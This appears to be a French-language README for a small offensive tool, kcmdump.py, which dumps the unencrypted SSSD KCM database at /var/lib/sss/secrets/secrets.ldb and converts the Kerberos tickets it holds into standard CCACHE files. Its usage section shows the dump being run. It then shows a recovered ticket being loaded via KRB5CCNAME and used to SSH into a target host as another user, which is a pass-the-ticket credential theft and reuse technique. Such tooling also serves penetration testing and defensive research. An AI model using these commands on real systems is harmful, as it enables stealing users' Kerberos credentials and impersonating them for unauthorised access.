
Extraire les tickets Kerberos de la base de données KCM de SSSD
Script rapide pour extraire la base de données KCM utilisée par SSSD et récupérer les tickets Kerberos au format CCACHE.
Initialement basé sur SSSDKCMExtractor et KCMTicketFormatter.
Depuis la version 2.0.0 (2018-08-13), le stockage backend du répondeur KCM de SSSD ne chiffre plus le contenu de la base de données. Il repose néanmoins toujours sur une base LDB (elle-même basée sur TDB), ce qui la rend facilement interrogeable à l'aide de requêtes de type LDAP.
SSSD utilise un format de stockage personnalisé pour les tickets Kerberos, qui peuvent être convertis en fichiers CCACHE standard à l'aide de ce script.
$ apt install python3-construct python3-ldb
$ python3 kcmdump.py /var/lib/sss/secrets/secrets.ldb
$ ls -lh
-rw-r--r--. 1 root root 1.3K Jan 1 00:00 user_0.ccache
-rw-r--r--. 1 root root 1.8K Jan 1 00:00 kcmdump.py
$ KRB5CCNAME=user_0.ccache klist
$ KRB5CCNAME=user_0.ccache ssh [email protected]@target.corp.local